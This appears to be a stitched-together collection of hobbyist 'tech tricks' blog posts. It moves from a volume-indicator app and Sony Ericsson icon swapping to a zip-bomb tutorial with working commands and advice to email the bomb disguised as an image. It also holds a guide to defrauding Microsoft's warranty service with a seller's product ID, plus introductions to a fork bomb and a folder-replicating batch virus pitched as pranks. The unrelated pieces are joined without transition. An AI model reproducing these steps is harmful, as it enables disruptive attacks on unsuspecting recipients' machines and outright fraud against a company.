On Screen Volume Control Indicator For Windows

Depending on the manufacturer, some sound cards and laptops come with a eye candy on-screen volume control indicator software. Even though it can be useful, many users have no choice but to use the default Windows Volume Control options. After all, what’s the point of having an eye candy interface without any functionality?

3RVX brings not only an on-screen volume control indicator but also includes hotkeys to take full control of it. The on screen volume displays are skinnable and by default you will find 8 different skins, with more that can be downloaded from the developer’s site.

Once launched, the app sits in the system tray and can be set to launch with Windows. The behavior and display settings are customizable and so are the hotkeys. Change Sonyericsson Default Menu Icons

Many users end up in my blog searching “Sony ericsson themes, Sony ericsson secrets codes ..” etc in search engines but they don’t find exactly what they want. So I thought I will write something which any SE phone user will love.
Firstly let me warn you that playing with your phone settings is not a joke You should take extreme care not to mess up things. you may end up damaging your phone beyond recovery.The tutorial is very simple and the picture below is what I have done to my W580i phone menu.

Did you like it?
OK …before you can start with you work make sure you have/satisfy the following
1. XS++ : This is the tool which will help you to transfer your new menu icons to your phone. If you dont have it download it from here .
2. Menu Icons : You can do a quick google search for SE Menu icons and you will get lot of sites with good menu icons. If you dont find any, download any of the below menu icons pack from my site. These were not designed by me (Oh! yes you can design your own menu icons using another tool which I will mention later). I dont know who the designer is but I must say I love the designs.

1. menu-1.zip (This is the pack which I have used)

3. mixed-menu-icons.zip
4. fire-menu-icons.zip

3. 80 – 100 % battery charge : Make sure you battery is fully charged. (This is very important)
4. USB drivers for your phone.
6. Data cable (You cant do anything without this.. bluetooth does not help you in this )
Now here is the step by step procedure.
1. Switch off your phone ( Yes you cannot see a live preview of your new menu… Like DIGG says “Patience My friend is a virtue”)
2. Open “XS++” and you should have something like this

3. Press “Connect” button. Leave the default settings as it is and you will see that XS++ will ask you to connect you phone.
4. Press and hold “c” in your phone and connect your phone to your PC with the USB cable (You have 30 seconds for this).
5. Xs++ will show your phone status (see below screenshot).

6. Now slect the radio button for “FSX” (See below screenshot)

7. Press “Start FSX“. XS++ will start building your phone’s system folders. This may take some time depending on your phone’s model and the amount of data you have in your memory card. Dont worry if XS++ hangs for some time. Wait until all the folders are mapped.

8. Expand “tpa” (Click the + symbol) -> preset -> system -> menu

9. Now you will see a list of files. The PNG files you see are the icons. You will also see a file named menu.ml. This file has all the details about menu icons and their links.

10. Drag and drop the icon files which you have downloaded (Make sure you unzip the contents before uploading). By deafult XS++ replaces all the files but you can delete the existing icons manually.

11. uploading will take some time depending upon the size of your images.

12. Once the upload is complete. Click shutdown and press “Yes” in the confirmation box.

Now disconnect your phone and switch it on.
Does it switch on? NO? OMG what have you done? Did you miss any step?
Yes! dont worry the phone will not switch until you perform the next step.
13. Remove and reinsert the battery. Switch on your phone and have fun with your new menu icons.

Freak out your Friends Using a Zip Bomb

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don’t detonate it on yourself.

Here is how to make your own Zip Bomb of Death -

1. Create a new text file,name it a.txt
2. Open and type the null character (alt + 255) in it.
3. Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.
4. Open Command prompt and navigate to the folder containing a.txt . Type the following command:
   

   copy /b *.txt b.txt

This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from the beginning again and again to make a really big text file.

Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or Winzip into a zip file.

You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.

Make sure that YOU DONT OPEN THIS afterwards.

You can make the same file in Linux by typing -

dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Send it to your friends (or foes) and it will definitely annoy them . Use some creativity and rename the text file into some thing like Angelina Jolie.jpg and compress it and email to your friends. Once they download it,they will never be able to download again (sarcasm..sarcasm).More disastrous combinations can be made by experimenting with it.I mean..you get the idea

If you are too lazy like me and you don’t want to do all this then you can download the most dangerous zip bombs of all time from here. This size of this zip is only 42 KB which will uncompress to about 4 Petabytes (1 Peta byte = 1024 TB and 1 TB = 1024 GB ) of file size. Dangerous huh..?

I work as a manager in HP for north american customers, so i have been hanging around in this field since a long time. So just by a little research i managed to find the bug!

Lets start

PART 1

1. Go to ebay.com
2. Search for "Microsoft Products". (Suppose you chose a "gaming keyboard")
3. Select any product below $150, and tell the seller that "I am ready to buy, but just to make sure that I am getting the right thing, i want to know the PID number of the product".
4. Seller will mail you PID number.

Part 2

1. Call up microsoft customer service OR have a chat with their representative
2. I dont have the number byhearted so goto support.microsoft.com and find that out
3. Tell them that " I own this (the same) Gaming Keyboard, its broken, some of the keys are not working, I have done all the troubleshooting."
4. VOILA!, they will say that "Its ok, sir, we will send your another!"
5. YOUR DONE!!


How it works?

When they send you another keyboard, they would NOT ask you to return the existing broken keyboard, because the SHIPPING will cost them more than the price of the keyboard. So thats what is the loophole

Why till $150?

As i mentioned above, if the replacement product costs more than $150, then they will ask you to return the existing broken product at the time of delivery, which apperantly we dont have .

Can I get caught?

NO!. Its done through complete legal way, I have already ordered 5 of them and have received 3 at my friend's place in US. I am expecting them to drop 1 of them at my place (india), within couple of days.

How To Make Fork Bomb (Rabbit virus)

Introduction

I've got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don't bomb yourself.

Folder Replicator Batch Virus

Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

Here is trick to open cdrom in 1 click. For this you have to make a file which when clicked open cdrom. So to make that file follow given steps:

1). Open notepad.

2). Copy given code as it is into it
